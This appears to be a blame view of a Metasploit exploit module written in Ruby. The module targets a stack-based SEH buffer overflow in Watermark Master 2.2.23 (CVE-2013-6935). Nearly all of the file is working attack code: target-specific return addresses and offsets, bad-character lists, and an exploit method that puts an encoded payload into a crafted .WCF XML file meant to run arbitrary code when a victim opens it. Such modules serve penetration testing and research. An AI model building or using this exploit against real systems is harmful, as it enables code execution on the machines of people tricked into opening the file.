Files
metasploit-gs/modules/exploits/windows/fileformat/watermark_master.rb
T

97 lines
2.6 KiB
Ruby
Raw Normal View History

2015-08-13 16:26:17 -04:00
##
2017-07-24 06:26:21 -07:00
# This module requires Metasploit: https://metasploit.com/download
2015-08-13 16:26:17 -04:00
# Current source: https://github.com/rapid7/metasploit-framework
##
2016-03-08 14:02:44 +01:00
class MetasploitModule < Msf::Exploit::Remote
2015-08-13 16:26:17 -04:00
Rank = NormalRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'Watermark Master Buffer Overflow (SEH)',
'Description' => %q{
This module exploits a stack based buffer overflow in Watermark Master 2.2.23 when
processing a specially crafted .WCF file. This vulnerability could be
exploited by a remote attacker to execute arbitrary code on the target
machine by enticing a user of Watermark Master to open a malicious .WCF file.
},
'License' => MSF_LICENSE,
'Author' =>
[
'metacom', # Original discovery
'Andrew Smith', # MSF Module
],
'References' =>
[
[ 'OSVDB', '99226' ],
2015-08-13 16:26:17 -04:00
[ 'CVE', '2013-6935'],
[ 'EBD', '29327' ]
],
'DefaultOptions' =>
{
2015-08-13 17:25:31 -04:00
'EXITFUNC' => 'process',
2015-08-13 16:26:17 -04:00
},
'Platform' => 'win',
'Payload' =>
{
'BadChars' => "\x00\x0a\x0d\x3c\x22\x26",
2015-08-13 17:24:18 -04:00
'DisableNops' => false,
2015-08-13 16:26:17 -04:00
'Space' => 7276
},
'Targets' =>
[
2015-09-29 22:41:36 -04:00
[ 'Windows 7 x32 - Watermark Master 2.2.23',
2015-09-29 22:36:30 -04:00
{
'Ret' => 0x10015f2d, #p/p/r | CommonClassesMFC.dll
'Offset' => 516
}
],
2015-09-29 22:41:36 -04:00
[ 'Windows 7 x64 - Watermark Master 2.2.23',
2015-08-13 16:26:17 -04:00
{
2015-09-29 22:41:36 -04:00
'Ret' => 0x1001329a, #p/p/r | CommonClassesMFC.dll
2015-08-13 16:26:17 -04:00
'Offset' => 516
}
],
],
'Privileged' => false,
'DisclosureDate' => 'Nov 1 2013',
'DefaultTarget' => 0))
register_options([OptString.new('FILENAME', [ false, 'The file name.', 'msf.wcf']),])
2015-08-13 16:26:17 -04:00
end
def exploit
buffer = rand_text(target['Offset'])
buffer << generate_seh_record(target.ret)
buffer << payload.encoded
2015-10-06 18:12:40 -04:00
buffer << rand_text(18000 - buffer.length)
2015-08-13 16:26:17 -04:00
file = %Q|<?xml version="1.0" encoding="Windows-1252" ?><config ver="2.2.23.00">
<cols name="Files"/>
<cols name="Profiles">
<Property name="Profile">
<cols name="Watermarks"/>
<cols name="Timelines"/>
<cols name="Streams">
<Property name="Stream">
<Value name="SourcePath" type="8" value="#{buffer}"/>
</Property>
</cols>
<cols name=""/>
</Property>
</cols>
</config>|
2015-08-13 16:27:27 -04:00
print_status("Creating '#{datastore['FILENAME']}' file ...")
2015-08-13 16:26:17 -04:00
file_create(file)
end
end